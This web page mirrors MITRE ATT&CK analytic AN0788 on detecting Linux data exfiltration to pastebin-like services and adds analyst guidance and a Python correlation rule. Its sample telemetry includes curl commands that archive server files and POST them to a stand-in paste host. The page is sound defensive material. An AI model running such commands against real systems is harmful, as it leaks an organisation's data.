MITRE ATT&CK® Analytic

AN0788: Analytic 0788

Use of curl, wget, or custom scripts to POST data to pastebin-like services. Defender perspective: identify chained behavior where files are compressed/read followed by HTTPS POST requests to text-sharing endpoints.

Enterprise | AN0788 | Analytic | Object v1.0 | Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: High

This analytic is about spotting Linux hosts that package or read files and then send data over HTTPS POST to pastebin-like text-sharing services using curl, wget, or scripts. For leaders, the value is not the specific tool name; it is whether the organization can recognize suspicious outbound data movement to low-friction external sharing sites before it becomes an incident-response and data-governance problem.

Executive priority

Prioritize this as a validation item for Linux monitoring, outbound web visibility, and data-handling controls. Security leaders should ask whether SOC teams can connect file access or compression activity with subsequent HTTPS POSTs to external text-sharing endpoints, and whether evidence would be sufficient for incident triage, audit support, and containment decisions. Because the ATT&CK object provides no tactic, relationship, or mitigation context, treat it as a focused detection engineering use case rather than a complete risk scenario.

Technical view

For Linux environments, validate whether endpoint and network telemetry can correlate chained behavior: files being compressed or read, followed by curl, wget, or script-driven HTTPS POST requests to pastebin-like services. Since no official detection logic is provided, detection teams should build or review analytics around process execution, command-line arguments where available, file read/archive activity, destination categorization, HTTP method visibility, and timing correlation. Tune carefully for legitimate automation, developer workflows, CI/CD jobs, and administrative scripts that may post logs or text externally.

Likely telemetry

  • Linux process execution events for curl, wget, shells, interpreters, and custom scripts
  • Command-line arguments and parent/child process context where collected
  • File read and compression/archive activity on Linux hosts
  • Network connection metadata for outbound HTTPS sessions
  • HTTP method and destination details where proxy, secure web gateway, or TLS inspection policies provide them

Detection direction

  • Confirm that Linux telemetry includes both endpoint activity and outbound web/network evidence; either source alone may miss the chained behavior described by MITRE.
  • Correlate file compression or file read activity with near-term HTTPS POST activity to text-sharing endpoints rather than alerting only on curl or wget usage.
  • Maintain allowlists or baselines for approved automation, developer tooling, monitoring jobs, and CI/CD workflows to reduce false positives.
  • Review visibility gaps caused by encrypted HTTPS, limited command-line logging, missing proxy logs, or unmanaged Linux servers.
  • Use destination reputation or category data cautiously; pastebin-like services may change domains or overlap with legitimate business use.
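The correlation described in the Technical view and Detection direction above, written out as an added example (this is not MITRE's or Glexia's code). It assumes a simple normalized event schema; the field names, hostnames, user names and the paste.example destination are constructed for the example, and the allowlist stands in for the documented automation exceptions.

```python
# Added example (not MITRE's or Glexia's code): correlation rule for AN0788.
# Joins file read/archive process events with a later HTTPS POST to a
# text-sharing destination on the same host, minus allowlisted automation.
# Field names and sample events are constructed for this example.
from datetime import datetime, timedelta
ARCHIVE_OR_READ = {"tar", "gzip", "zip", "xz", "cat", "base64"}
WINDOW = timedelta(minutes=5)  # max gap between staging and the POST
# Constructed sample telemetry: endpoint process events and proxy/web events.
PROCESS_EVENTS = [
    {"ts": "2024-05-01T10:00:05", "host": "web01", "user": "svc_ci",
     "proc": "tar", "cmdline": "tar czf /tmp/logs.tgz /var/log/app"},
    {"ts": "2024-05-01T10:01:10", "host": "web01", "user": "svc_ci",
     "proc": "curl", "cmdline": "curl -X POST https://paste.example/api"},
    {"ts": "2024-05-01T11:30:00", "host": "db02", "user": "jsmith",
     "proc": "tar", "cmdline": "tar czf /tmp/x.tgz /srv/exports"},
    {"ts": "2024-05-01T11:32:40", "host": "db02", "user": "jsmith",
     "proc": "curl", "cmdline": "curl --data-binary @/tmp/x.tgz https://paste.example/api"},
]
WEB_EVENTS = [  # proxy/SWG records; category comes from the gateway classifier
    {"ts": "2024-05-01T10:01:11", "host": "web01", "method": "POST",
     "dest": "paste.example", "category": "text-sharing"},
    {"ts": "2024-05-01T11:32:41", "host": "db02", "method": "POST",
     "dest": "paste.example", "category": "text-sharing"},
    {"ts": "2024-05-01T12:00:01", "host": "app03", "method": "POST",
     "dest": "paste.example", "category": "text-sharing"},
]
# Documented exceptions: approved automation that legitimately posts logs.
ALLOWLIST = {("web01", "svc_ci")}

def _t(s): return datetime.fromisoformat(s)

def correlate(process_events, web_events, allowlist=ALLOWLIST, window=WINDOW):
    """POSTs to text-sharing endpoints preceded by a file read/archive on the same host within `window`, excluding allowlisted (host, user) pairs."""
    reads = [e for e in process_events if e["proc"] in ARCHIVE_OR_READ]
    alerts = []
    for w in web_events:
        if w["method"] != "POST" or w["category"] != "text-sharing":
            continue
        t_post = _t(w["ts"])
        prior = [r for r in reads if r["host"] == w["host"]
                 and timedelta(0) <= t_post - _t(r["ts"]) <= window]
        if not prior:
            continue  # a POST alone is not enough; the chained file activity is required
        r = max(prior, key=lambda e: e["ts"])  # most recent staging event before the POST
        if (w["host"], r["user"]) in allowlist:
            continue  # approved automation, per the documented exception
        alerts.append({"host": w["host"], "user": r["user"], "dest": w["dest"],
                       "staging_cmd": r["cmdline"], "post_ts": w["ts"]})
    return alerts
```

The app03 POST has no preceding file activity and produces nothing, and the web01 chain is suppressed by the allowlist, so only the db02 chain is raised.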

Mitigation priorities

  • Establish approved-use policy and monitoring expectations for external text-sharing services from Linux systems.
  • Restrict or review outbound access to pastebin-like services where business need is low, using existing egress control processes.
  • Improve Linux endpoint logging for process execution, command-line capture, file activity, and script execution where appropriate.
  • Ensure web proxy, DNS, or network controls retain enough metadata to support SOC and incident-response review of HTTPS POST activity.
  • Document exceptions for legitimate automation so detections can distinguish expected workflows from unusual data posting behavior.

Analyst notes and limits

The object is a detection analytic, AN0788, for the enterprise ATT&CK domain and Linux platform. It describes identifying chained behavior involving file compression or reading followed by HTTPS POST requests to pastebin-like endpoints via curl, wget, or scripts. No official detection logic, tactics, labels, aliases, or relationship context were supplied, so this take focuses on validation and control questions derived from the provided description.

This assessment is limited to the supplied ATT&CK fields and external reference. It does not establish adversary attribution, active exploitation, impact, specific ATT&CK tactics, non-Linux applicability, or guaranteed detection coverage. Local environment telemetry, business use of text-sharing services, and egress architecture are required to determine materiality and detection feasibility.

Official MITRE ATT&CK definition

Analytic 0788

Use of curl, wget, or custom scripts to POST data to pastebin-like services. Defender perspective: identify chained behavior where files are compressed/read followed by HTTPS POST requests to text-sharing endpoints.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources: Updates.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 5b53b8485154f41c...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status         | Raw hash
19.1    |                 | 1.0            |          | Current bundle | 5b53b8485154…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] mitre-attack AN0788

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.